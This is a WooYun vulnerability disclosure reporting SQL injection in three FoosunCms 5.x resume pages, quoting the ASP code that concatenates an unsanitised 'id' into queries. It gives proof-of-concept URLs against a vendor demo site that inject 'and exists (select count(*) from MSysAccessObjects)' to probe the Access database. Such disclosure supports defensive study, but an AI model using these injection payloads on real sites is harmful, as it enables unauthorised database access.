当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078961

漏洞标题:FoosunCms 5.x最新版本多处sql注入

相关厂商:FoosunCms

漏洞作者: menmen519

提交时间:2014-10-15 11:41

修复时间:2015-01-13 11:42

公开时间:2015-01-13 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

FoosunCms 5.x最新版本多处sql注入

详细说明:

直接看代码:
User/job/lib/AP_Resume_workcity.asp:(9-15):

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("workcity",id)
%>


这里面有一个getResumeInfo函数 ,我们跟进去看看
cls_resume.asp:

Public function getResumeInfo(part,id)
Dim sqlstatement,resumeRs
Set resumeRs=Server.CreateObject(G_FS_RS)
select case NoSqlHack(part)
case "baseinfo" sqlstatement="select BID,UserNumber,Uname,Sex,PictureExt,Birthday,CertificateClass,CertificateNo,CurrentWage,CurrencyType,WorkAge,Province,City,HomeTel,CompanyTel,Mobile,Email,QQ,isPublic,click,lastTime,address,ShenGao,XueLi,HowDay from FS_AP_Resume_BaseInfo where bid="&CintStr(id)
case "intention" sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
case "position" sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
case "workcity" sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
case "workexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,CompanyName,CompanyKind,Trade,Job,Department,Description,Certifier,CertifierTel from FS_AP_Resume_WorkExp where bid="&CintStr(id)
case "educateexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,SchoolName,Specialty,Diploma,Description from FS_AP_Resume_EducateExp where bid="&CintStr(id)
case "trainexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,TrainOrgan,TrainAdress,TrainContent,Certificate from FS_AP_Resume_TrainExp where bid="&CintStr(id)
case "language" sqlstatement="select BID,UserNumber,Language,Degree from FS_AP_Resume_Language where bid="&CintStr(id)
case "certificate" sqlstatement="select BID,UserNumber,FetchDate,Certificate,Score from FS_AP_Resume_Certificate where bid="&CintStr(id)
case "projectexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,Project,SoftSettings,HardSettings,Tools,ProjectDescript,Duty from FS_AP_Resume_ProjectExp where bid="&CintStr(id)
case "other" sqlstatement="select BID,UserNumber,Title,Content from FS_AP_Resume_Other where bid="&CintStr(id)
case "mail" sqlstatement="select BID,UserNumber,MailName,Content from FS_AP_Resume_Mail where bid="&CintStr(id)
End select
resumeRs.open sqlstatement,Conn,1,3
if resumeRs.eof then exit function
if part="baseinfo" then
base_BID=resumeRs("BID")
base_UserNumber=resumeRs("UserNumber")
base_Uname=resumeRs("Uname")
base_Sex=resumeRs("Sex")
base_PictureExt=resumeRs("PictureExt")
base_Birthday=resumeRs("Birthday")
base_CertificateClass=resumeRs("CertificateClass")
base_CertificateNo=resumeRs("CertificateNo")
base_CurrentWage=resumeRs("CurrentWage")
base_CurrencyType=resumeRs("CurrencyType")
base_WorkAge=resumeRs("WorkAge")
base_Province=resumeRs("Province")
base_City=resumeRs("City")
base_HomeTel=resumeRs("HomeTel")
base_CompanyTel=resumeRs("CompanyTel")
base_Mobile=resumeRs("CompanyTel")
base_Email=resumeRs("Email")
base_QQ=resumeRs("QQ")
base_isPublic=resumeRs("isPublic")
base_click=resumeRs("click")
base_lastTime=resumeRs("lastTime")

base_address=resumeRs("address")
base_ShenGao=resumeRs("ShenGao")
base_XueLi=resumeRs("XueLi")
base_HowDay=resumeRs("HowDay")
Elseif part="intention" then
Itn_WorkType=resumeRs("WorkType")
Itn_Salary=resumeRs("Salary")
Itn_SelfAppraise=resumeRs("SelfAppraise")
Elseif part="position" then
pos_trade=resumeRs("trade")
pos_job=resumeRs("job")
Elseif part="workexp" then
wep_BeginDate=resumeRs("BeginDate")
wep_EndDate=resumeRs("EndDate")
wep_CompanyName=resumeRs("CompanyName")
wep_CompanyKind=resumeRs("CompanyKind")
wep_Trade=resumeRs("Trade")
wep_Job=resumeRs("job")
wep_Department=resumeRs("Department")
wep_workDescription=resumeRs("Description")
wep_Certifier=resumeRs("Certifier")
wep_CertifierTel=resumeRs("CertifierTel")
Elseif part="educateexp" then
edu_BeginDate=resumeRs("BeginDate")
edu_EndDate=resumeRs("EndDate")
edu_SchoolName=resumeRs("SchoolName")
edu_Specialty=resumeRs("Specialty")
edu_Diploma=resumeRs("Diploma")
edu_Description=resumeRs("Description")
Elseif part="trainexp" then
train_BeginDate=resumeRs("BeginDate")
train_EndDate=resumeRs("EndDate")
train_TrainOrgan=resumeRs("TrainOrgan")
train_TrainAdress=resumeRs("TrainAdress")
train_TrainContent=resumeRs("TrainContent")
train_Certificate=resumeRs("Certificate")
Elseif part="language" then
lng_Language=resumeRs("Language")
lng_Degree=resumeRs("Degree")
Elseif part="certificate" then
cer_FetchDate=resumeRs("FetchDate")
cer_Certificate=resumeRs("Certificate")
cer_Score=resumeRs("Score")
Elseif part="projectexp" Then
Pro_BeginDate=resumeRs("BeginDate")
Pro_EndDate=resumeRs("EndDate")
Pro_Project=resumeRs("Project")
Pro_SoftSettings=resumeRs("SoftSettings")
Pro_HardSettings=resumeRs("HardSettings")
Pro_Tools=resumeRs("Tools")
Pro_ProjectDescript=resumeRs("ProjectDescript")
Pro_Duty=resumeRs("Duty")
Elseif part="other" Then
o_title=resumeRs("title")
o_content=resumeRs("content")
Elseif part="mail" Then
mailTitle=resumeRs("MailName")
mailContent=resumeRs("Content")
End if
End function


看到这里 :
case "intention" sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
case "position" sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
case "workcity" sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
这三个没有做任何处理
我们直接访问:
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects)
正常访问,我们可以添加一个关键字,让它sql报错
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects1)

1.png


这里我们已经证明了我们的猜想
下来看第二处
User\Job\lib\AP_Resume_Position.asp:

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("position",id)
%>



第三处:
FoosunCMS\User\Job\lib\AP_Resume_Intention.asp:

Response.Charset="GB2312"
session("resumeStep")="baseinfo"
Dim resumeObj,id,Conn
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("intention",id)
Conn.close
Set Conn=nothing
%>


ok.................

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝